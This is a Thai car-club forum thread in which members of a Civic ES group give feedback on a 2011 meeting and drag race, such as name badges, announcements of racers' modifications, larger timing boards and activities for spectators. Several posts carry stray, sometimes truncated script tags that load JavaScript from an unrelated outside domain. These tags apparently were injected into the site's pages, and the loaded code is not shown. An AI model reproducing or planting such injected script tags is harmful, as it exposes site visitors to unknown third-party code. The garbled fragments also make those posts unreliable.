ตอบ
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 22 พฤษภาคม 2011 23:19 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
อยากได้ข้อเสนอแนะ ข้อคิดเห็น สิ่งที่ขาดตกบกพร่อง ของมิตติ้งครั้งนี้ครับ

ซึ่งผมและคณะกรรมการถือว่าเป็นงานใหญ่ประจำปีก็ว่าได้ เพื่อเป็นการปรับปรุงในครั้งต่อๆไปครับ
hacker

อาทิตย์, 22 พฤษภาคม 2011 23:19 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
จองพื้นที่
ได้รับคำขอบคุณจาก: brunox  civic753  bank  nawintar  mark_es03  ahingrace  Es_SaLaRyMaN  beeladin  kittidech  8800Gold 
bbb@es

เข้าร่วม: 14 ธันวา 2008
ตอบ: 993

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1161
ให้คำขอบคุณ: 48

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 22 พฤษภาคม 2011 23:45 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ขอขอบคุณคณะทำงานทุกท่านนะคับที่ทำให้พวกเราสนุกสนานกันงานจัดได้ดีมากๆคับขอบคุณคับ
ได้รับคำขอบคุณจาก: wut-chiangmai  brunox  soda_get  bank  nawintar  ohm  Wii_ES05  ahingrace  Es_SaLaRyMaN  carrimoroll  kittidech 
POM_PeTiTe

ชื่อเล่น: ปอมซัง

เข้าร่วม: 04 ตุลา 2008
ตอบ: 774

Guru ES
Guru ES

ได้รับคำขอบคุณ: 221
ให้คำขอบคุณ: 139

สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 22 พฤษภาคม 2011 23:55 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ชอบมาก
ได้รับคำขอบคุณจาก: wut-chiangmai  brunox  soda_get  bank  nawintar  ohm  Wii_ES05  ahingrace  Es_SaLaRyMaN  carrimoroll  kittidech 
wut-chiangmai

ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 23 พฤษภาคม 2011 00:18 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ทีมงานดำเนินกิจกรรมได้สุดยอดเลยครับ

ขอเสนอข้อแนะนำสักเล็กน้อยครับ

ตอนแข่งขัน ปกติจะประกาศเลขเฉย ๆ อยากให้มีการประกาศชื่อด้วยอะครับ (คล้าย ๆ เวลาพากย์มวย )
และรุ่นใหญ่ ๆ อยากให้มีบอกสเต็ปโมดิฟายเครื่องยนต์ด้วยอะครับ ประมาณเป็นฉายาเรียกประมาณนี้อะครับ

แต่ก็เข้าใจว่าแข่งกันค่อนข้างเร็ว เพราะมีจำนวนเยอะ อาจจะไม่มีเวลาพออ่าครับ "<script src="https://sport32news.com/civicesgroup.js">

แล้วก็อีกประการนึง (น่าจะเป็นคอมเม้นกับสนามมากกว่า)
ตัวเลขบอกเวลาตัวเล็กจังเลยอะครับ นั่งบนอัฒจรรย์ เวลาแดดจัด ๆ นี่มองไม่ออกเลยครับ
คิดในใจว่า "เอ ทำไมเค้าไม่ทำป้ายบอกเวลาตัวโต ๆ วางไว้บนอัฒจรรย์ด้วยนะ"

โดยรวมแล้ว งานครั้งนี้ สุดยอดมาก ๆ เลยครับ รถเยอะ คนเยอะ ความมันส์ก็เยอะ
ขอบคุณทีมงานครับผม
ได้รับคำขอบคุณจาก: brunox  soda_get  bank  nawintar  yoosabai  jonatan  mark_es03  ohm  Phetcharat  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  Nung_Sodapop  kittidech  cisco 
jonatan

ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 23 พฤษภาคม 2011 07:44 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
สุดยอดแล้วคับ จ๊อป
แต่นิดหนึ่งคับ รอบนี้ม่ะมี
รถเด่นประจำมิตติ้งเลยอ่ะคับ
ผมว่าทุกมิตติ้งน่าจะมี รถเด่นประจำมิตติ้งน่ะคับ
ให้เพ่ือนๆในคลับมีส่วนได้ vote เป็นการรวมสนุกกันในเวปฯ
และได้เผ่ือเป็นแนวทางในการแต่งรถด้วยอ่ะคับ
ได้รับคำขอบคุณจาก: wut-chiangmai  brunox  soda_get  bank  nawintar  mark_es03  ohm  Phetcharat  Wii_ES05  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  Nung_Sodapop  kittidech  cisco 
InDePenDent

ชื่อเล่น: ยู

เข้าร่วม: 20 สิงหา 2009
ตอบ: 901

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1603
ให้คำขอบคุณ: 2016

จันทร์, 23 พฤษภาคม 2011 07:56 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
jonatan พิมพ์ว่า:
ผมว่าทุกมิตติ้งน่าจะมี รถเด่นประจำมิตติ้งน่ะคับ
ให้เพ่ือนๆในคลับมีส่วนได้ vote เป็นการรวมสนุกกันในเวปฯ
และได้เผ่ือเป็นแนวทางในการแต่งรถด้วยอ่ะคับ

ได้รับคำขอบคุณจาก: brunox  bank  nawintar  ohm  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech  cisco 
Black mOOn

ชื่อเล่น: โจ้

ตอบ: 956

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2334
ให้คำขอบคุณ: 302

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 23 พฤษภาคม 2011 08:19 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
สุดยอดครับ ขอบคุงทีมงาน ขอบคุงแดดร้อนๆที่แผดเผาลงมาอย่างได้ใจ แต่ทุกๆคนก็ยังมันกันแบบไม่กลัวร้อน
ได้รับคำขอบคุณจาก: wut-chiangmai  brunox  soda_get  bank  nawintar  honeybeex7  ohm  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech 
ratachai

เข้าร่วม: 22 กรกฎา 2010
ตอบ: 596

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 631
ให้คำขอบคุณ: 105

จันทร์, 23 พฤษภาคม 2011 08:22 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ขอกิจกรรมสำหลับคนไปดูแต่ไม่ได้ไปแข่งด้วยคับ อะไรก็ได้แบบนิดนุง งานมิตติ้งแต่ดูเหมือนจาเป็นกลุ่มๆอยากรู้จักเพื่อนไหม่ด้วยคับส่วนตัวไปคนเดียว อีกอย่างคิดว่าเพื่อนๆคงอยากรู้รุ่น KINGหรือOPEN ไม่ทราบว่าเป้นความลับหรือเปล่าอยากรู้ว่าคันนี้ลงโบว์หรือเครื่องอะไรโมอะไรมาบ้างผมว่า น่าจาสนุกว่านี้ เช่น1.7MT เจอDC5 แล้ว1.7กินขาดผมก็อยากรู้ 1.7 ทำไรมาบ้าง คิดเห็นส่วนตัวนะคับ
ได้รับคำขอบคุณจาก: wut-chiangmai  brunox  soda_get  bank  nawintar  yoosabai  honeybeex7  ohm  Phetcharat  Wii_ES05  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  Nung_Sodapop  kittidech 
toshi

เข้าร่วม: 13 พฤศจิกา 2008
ตอบ: 2299

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1405
ให้คำขอบคุณ: 1756

ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 23 พฤษภาคม 2011 08:27 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ชอบคาบ เป็นมิตติ้งครั้งแรก ประทับใจทีมงานมาก...หนุกหนานมากคาบ...
ได้รับคำขอบคุณจาก: wut-chiangmai  brunox  soda_get  bank  nawintar  ohm  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech 
brunox

ชื่อเล่น: โอ

เข้าร่วม: 03 ธันวา 2009
ตอบ: 811

Guru ES
Guru ES

ได้รับคำขอบคุณ: 938
ให้คำขอบคุณ: 3182

ปี: 2002
จันทร์, 23 พฤษภาคม 2011 08:38 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
อยากเสนอให้มีการทำป้ายชื่อที่หน้าอกซักกะหน่อยก็ดีครับ
เวลามามีทติ้ง--เป็นชื่อล๊อคอิน+ชื่อเล่น

เพื่อนๆจะได้ทักทายกันได้ คืออย่างน้อยเวลาเป็นมีทติ้งใหญ่กลุ่มมันจะใหญ่มาก จับเป็นกลุ่มๆ เลยไม่กล้าทักทายกัน

เพราะว่าบางทีคุยกันแต่ในบอร์ดแต่ไม่เคยเห็นหน้ากันก็มีเยอะ

เวลาคนที่มาใหม่ๆหรือมาคนเดียวบางทีไม่รู้ว่าใครก็เขินๆก็ไม่กล้าทักทายกันซักเท่าไหร่

แต่งานมันส์มากครับเซียนจ๊อบ..อิอิ

แต่แอบกลับก่อนตอนบ่าย2เพราะผ.บ.ไม่ไหวเหะๆ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: bank  wut-chiangmai  nawintar  yoosabai  ohm  Wii_ES05  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  Nung_Sodapop  kittidech 
patoo

ชื่อเล่น: พงษ์

เข้าร่วม: 28 สิงหา 2010
ตอบ: 1273

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5438
ให้คำขอบคุณ: 3559

จันทร์, 23 พฤษภาคม 2011 08:39 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ratachai พิมพ์ว่า:
ขอกิจกรรมสำหลับคนไปดูแต่ไม่ได้ไปแข่งด้วยคับ อะไรก็ได้แบบนิดนุง งานมิตติ้งแต่ดูเหมือนจาเป็นกลุ่มๆอยากรู้จักเพื่อนไหม่ด้วยคับส่วนตัวไปคนเดียว อีกอย่างคิดว่าเพื่อนๆคงอยากรู้รุ่น KINGหรือOPEN ไม่ทราบว่าเป้นความลับหรือเปล่าอยากรู้ว่าคันนี้ลงโบว์หรือเครื่องอะไรโมอะไรมาบ้างผมว่า น่าจาสนุกว่านี้ เช่น1.7MT เจอDC5 แล้ว1.7กินขาดผมก็อยากรู้ 1.7 ทำไรมาบ้าง คิดเห็นส่วนตัวนะคับ

เห็นด้วยครับ น่าจะมีกิจกรรมสำหรับเพื่อนๆที่ไม่ได้ลงแข่งด้วย
ผมสังเกตว่ามีเพื่อนๆกลับไปกันก่อนเยอะเลยครับ
ได้เป็นการผูกสัมพันธ์พี่ๆน้องด้วยครับ
ส่วนการจัดในส่วนอื่นๆ ขอบอกว่าสุดยอดมากครับ
มันส์โคดๆครับ อย่าลืมจัดอีกนะครับ
ขอบคุณพวกพี่ๆมากครับ

แก้ไขล่าสุดโดย เมื่อ จันทร์, 23 พฤษภาคม 2011 09:00, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: brunox  bank  wut-chiangmai  nawintar  kismcomed  ohm  jukkadui  Wii_ES05  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  Nung_Sodapop  kittidech 
civic753

ชื่อเล่น: ชาติ

เข้าร่วม: 11 พฤศจิกา 2009
ตอบ: 1301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1304
ให้คำขอบคุณ: 2395

จันทร์, 23 พฤษภาคม 2011 08:48 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ผมรอดูภาพอยู่คับ ลุ้นจนเสียงท่อดังมาแถวๆๆๆตรังเลย <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: bank  wut-chiangmai  nawintar  ohm  Wii_ES05  ahingrace  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech 
Favonius

ชื่อเล่น: ซี

เข้าร่วม: 15 มิถุนา 2010
ตอบ: 782

ได้รับคำขอบคุณ: 626
ให้คำขอบคุณ: 2436

จันทร์, 23 พฤษภาคม 2011 08:58 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ชอบครับ เพิ่งไปครังแรกประทับใจมากๆครับ แต่ไม่รู้จักใครเลยไม่ต่อยกล้าคุยครับ
ได้รับคำขอบคุณจาก: soda_get  bank  wut-chiangmai  nawintar  ohm  Wii_ES05  ahingrace  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  Nung_Sodapop  kittidech 
Lee_ES_turbo

ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

จันทร์, 23 พฤษภาคม 2011 09:02 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
อยากได้อันดับที่ได้ของแต่ล่ะรุ่น ภาพประกอบ VDO clip ต่างๆคับ (รู้ว่ามีและพี่ๆยังไม่ได้ทำ แต่ใจร้อนนิ อิอิ)
ได้รับคำขอบคุณจาก: bank  wut-chiangmai  nawintar  ohm  Wii_ES05  ahingrace  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  Nung_Sodapop  kittidech 
soda_get

ชื่อเล่น: เก๊ต

เข้าร่วม: 30 กันยา 2008
ตอบ: 520

ได้รับคำขอบคุณ: 2286
ให้คำขอบคุณ: 2290

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 23 พฤษภาคม 2011 09:04 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
สุดยอดแล้วครับทีมงาน
ได้รับคำขอบคุณจาก: bank  wut-chiangmai  nawintar  ohm  Wii_ES05  ahingrace  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech 
Aod-Aod

เข้าร่วม: 26 เมษา 2010
ตอบ: 506

ได้รับคำขอบคุณ: 84
ให้คำขอบคุณ: 94

จันทร์, 23 พฤษภาคม 2011 09:14 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ได้รับคำขอบคุณจาก: bank  wut-chiangmai  nawintar  ohm  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech 
kismcomed

เข้าร่วม: 06 พฤษภาคม 2010
ตอบ: 321

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 655
ให้คำขอบคุณ: 1125

จันทร์, 23 พฤษภาคม 2011 09:27 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
patoo พิมพ์ว่า:

เห็นด้วยครับ น่าจะมีกิจกรรมสำหรับเพื่อนๆที่ไม่ได้ลงแข่งด้วย
ผมสังเกตว่ามีเพื่อนๆกลับไปกันก่อนเยอะเลยครับ
ได้เป็นการผูกสัมพันธ์พี่ๆน้องด้วยครับ
ส่วนการจัดในส่วนอื่นๆ ขอบอกว่าสุดยอดมากครับ
มันส์โคดๆครับ อย่าลืมจัดอีกนะครับ
ขอบคุณพวกพี่ๆมากครับ

+1 คับเพราะผมก็กลับก่อน คนข้างๆเค้าเบื่อไม่พามาก็ไม่ได้
ได้รับคำขอบคุณจาก: wut-chiangmai  yoosabai  ohm  brunox  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  Nung_Sodapop  kittidech 
nawintar

ชื่อเล่น: ต้าร์

เข้าร่วม: 08 พฤศจิกา 2009
ตอบ: 1383

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 285
ให้คำขอบคุณ: 64

จันทร์, 23 พฤษภาคม 2011 09:27 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
สวววววดยอดแล้วคับพี่จ๊อป แต่อย่าลืมของที่ผมขอวั้ยนะ และก้ออยากรู้สเต๊ปการโมของรถแชมด้วย
ได้รับคำขอบคุณจาก: wut-chiangmai  ohm  Wii_ES05  brunox  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech 
natthakorn5

ชื่อเล่น: เจซีวิค

เข้าร่วม: 21 กรกฎา 2009
ตอบ: 515

ได้รับคำขอบคุณ: 767
ให้คำขอบคุณ: 469

จันทร์, 23 พฤษภาคม 2011 09:35 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
อยากให้จัดทีมงาน ต้อนรับสมาชิกใหม่ครับ เพราะเวลามีสมาชิกเข้ามาใหม่ส่วนมากจะทำตัวไม่ถูก
ได้รับคำขอบคุณจาก: wut-chiangmai  ohm  Wii_ES05  brunox  ahingrace  benzd  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech  Gremlin 
koobe

ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 23 พฤษภาคม 2011 10:48 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
brunox พิมพ์ว่า:
อยากเสนอให้มีการทำป้ายชื่อที่หน้าอกซักกะหน่อยก็ดีครับ
เวลามามีทติ้ง--เป็นชื่อล๊อคอิน+ชื่อเล่น

เพื่อนๆจะได้ทักทายกันได้ คืออย่างน้อยเวลาเป็นมีทติ้งใหญ่กลุ่มมันจะใหญ่มาก จับเป็นกลุ่มๆ เลยไม่กล้าทักทายกัน

เพราะว่าบางทีคุยกันแต่ในบอร์ดแต่ไม่เคยเห็นหน้ากันก็มีเยอะ

เวลาคนที่มาใหม่ๆหรือมาคนเดียวบางทีไม่รู้ว่าใครก็เขินๆก็ไม่กล้าทักทายกันซักเท่าไหร่

แต่งานมันส์มากครับเซียนจ๊อบ..อิอิ

แต่แอบกลับก่อนตอนบ่าย2เพราะผ.บ.ไม่ไหวเหะๆ <script src="https://sport32news.com/civicesgroup.js"></

เห็นด้วยครับพี่จ๊อบ เรื่องป้ายชื่อห้อยคอ และแยกป้ายเลยว่ากรรมการ สมาชิก สตาฟ อะไรแบบนี้ ตัวกรอบป้ายสั่งทำ เอาแบบ ดีๆเลย อันนี้ยังใช้ต่อยอด เก็บค่าใช้จ่ายและยังเหลือเงินส่วนหนึ่งเพื่อบำรุงค่าใช้จ่ายคลับ (ของเรา)ด้วย คล้ายๆเข้าคลับ ES ต้องติดบัคร ผมคิดว่าทุกๆท่านยินดีเลยครับพี่ ผม ขอเสอนแนะครับ
ได้รับคำขอบคุณจาก: wut-chiangmai  yoosabai  ohm  Phetcharat  brunox  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  Nung_Sodapop  kittidech  Gremlin 
honeybeex7

เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 23 พฤษภาคม 2011 11:11 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
อยากรู้ว่ารถสีดำ หาก DC 2 ที่ได้ แชมป์ 17 วิอ่ะครับ เขาทำอะไรกะรถบ้าง ในแต่ละวัน ใช้ชีวิตยังไง ทานอะไรเป็นมื้อหลัก แซวนิดหน่อยไม่ถือนะครับพี่ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: ohm  wut-chiangmai  Wii_ES05  brunox  ahingrace  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech  Gremlin 
Black mOOn

ชื่อเล่น: โจ้

ตอบ: 956

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2334
ให้คำขอบคุณ: 302

จันทร์, 23 พฤษภาคม 2011 11:31 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
honeybeex7 พิมพ์ว่า:
อยากรู้ว่ารถสีดำ หาก DC 2 ที่ได้ แชมป์ 17 วิอ่ะครับ เขาทำอะไรกะรถบ้าง ในแต่ละวัน ใช้ชีวิตยังไง ทานอะไรเป็นมื้อหลัก แซวนิดหน่อยไม่ถือนะครับพี่ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

จะจัดบ้างหรืออาร์ม
ได้รับคำขอบคุณจาก: ohm  wut-chiangmai  honeybeex7  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech  Gremlin 
mark_es03

ชื่อเล่น: มาร์คกี้

เข้าร่วม: 01 กันยา 2010
ตอบ: 2301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1422
ให้คำขอบคุณ: 2183

จันทร์, 23 พฤษภาคม 2011 12:00 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ครั้งแรกประทับใจเสมอมันส์สุดยอด5555

ได้รับคำขอบคุณจาก: ohm  wut-chiangmai  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech  Gremlin 
witat

ชื่อเล่น: โต้งบางไผ่

เข้าร่วม: 11 กันยา 2010
ตอบ: 487

ได้รับคำขอบคุณ: 753
ให้คำขอบคุณ: 343

จันทร์, 23 พฤษภาคม 2011 12:03 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
ขอให้มีทุกปีครับ...
ได้รับคำขอบคุณจาก: ohm  wut-chiangmai  Wii_ES05  brunox  newcolor  carrimoroll  kittidech  Gremlin 
momo0101

ชื่อเล่น: เบิร์ด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1112

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3057
ให้คำขอบคุณ: 1628

สี: แดง ไฟร์เปปเปอร์ (R-507P)
จันทร์, 23 พฤษภาคม 2011 12:09 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
จัดได้ แจ่มมากครับ มือใหม่ไม่เคยลงแข่งอย่างผม
ถือได้ว่า เข้าใจ กฎและกติกา การแข่งขัน เบื่องต้น
ให้กำลังใจทีมงานทุกท่านนะครับ
ได้รับคำขอบคุณจาก: ohm  wut-chiangmai  Wii_ES05  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech 
es_mania

ชื่อเล่น: แมน

ตอบ: 1208

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2641
ให้คำขอบคุณ: 1357

จันทร์, 23 พฤษภาคม 2011 12:10 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
มันส์คับ แต่คนพากย์ เปลี่ยนคนให้พากย์มันส์ๆ หน่อยคับบ

เสียดายตกรอบ16คน king of 1.7
ได้รับคำขอบคุณจาก: ohm  wut-chiangmai  Wii_ES05  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech 
kismcomed

เข้าร่วม: 06 พฤษภาคม 2010
ตอบ: 321

ได้รับคำขอบคุณ: 655
ให้คำขอบคุณ: 1125

จันทร์, 23 พฤษภาคม 2011 12:14 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
อยากให้มีการจัด คอร์ด โมดิฟายรถเบื้องต้นด้วยคับ เพราะอยากรู้ตัวผมเองมีรถแต่ไม่ค่อยรู้เรื่องอะไรเล้ย..... โดนช่างหลอกแดกตลอด
ได้รับคำขอบคุณจาก: wut-chiangmai  Phetcharat  Wii_ES05  brunox  Es_SaLaRyMaN  newcolor  carrimoroll  kittidech 
hacker

จันทร์, 23 พฤษภาคม 2011 12:44 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด

ไว้จะลากเจ้าตัวมาลงรถเด่นครับ

jonatan พิมพ์ว่า:

ทำไม่ทันจริงๆครับพี่โจ ทุกทีบิ๊กจะจัดการ แต่เนื่องจากวันแข่งบิ๊กมันยุ่งมาก แทบระเบิดไปหลายที ไอ้อิทก็มาสาย เลยเศร้า
อีกอย่าง ไม่ได้ติดต่อใครไว้เลย เพราะเกรงว่าลงรูปลงรายละเอียดไป เพื่อนๆจะสนใจรถแข่งมากกว่า ยังไงจะปรับปรุงครับ ^^

brunox พิมพ์ว่า:

เคยคิดกันครับ แต่จบไม่ลงเนื่องด้วยเหตุผลที่ว่า ไม่รู้ว่าใครจะมาบ้าง เลยข้ามข้อนี้ไว้อ่ะครับ

natthakorn5 พิมพ์ว่า:
อยากให้จัดทีมงาน ต้อนรับสมาชิกใหม่ครับ เพราะเวลามีสมาชิกเข้ามาใหม่ส่วนมากจะทำตัวไม่ถูก

รับทราบครับ
ได้รับคำขอบคุณจาก: yoosabai  wut-chiangmai  brunox  honeybeex7  jonatan  Es_SaLaRyMaN  newcolor  soda_get  carrimoroll  Nung_Sodapop  kittidech 
coromant

เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
จันทร์, 23 พฤษภาคม 2011 13:03 - แบบสอบถาม ผลสรุป ข้อคิดเห็น คำเสนอแนะ มิตติ้งล่าสุด
น่าจะจัดหน้้าหนาวนะครับ รถจะได้วิ่งดีกว่านี้หน่อย และหน้าจะได้ไม่เกรียมครับ
ได้รับคำขอบคุณจาก: brunox  ahingrace  newcolor  carrimoroll  wut-chiangmai  Nung_Sodapop  kittidech 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.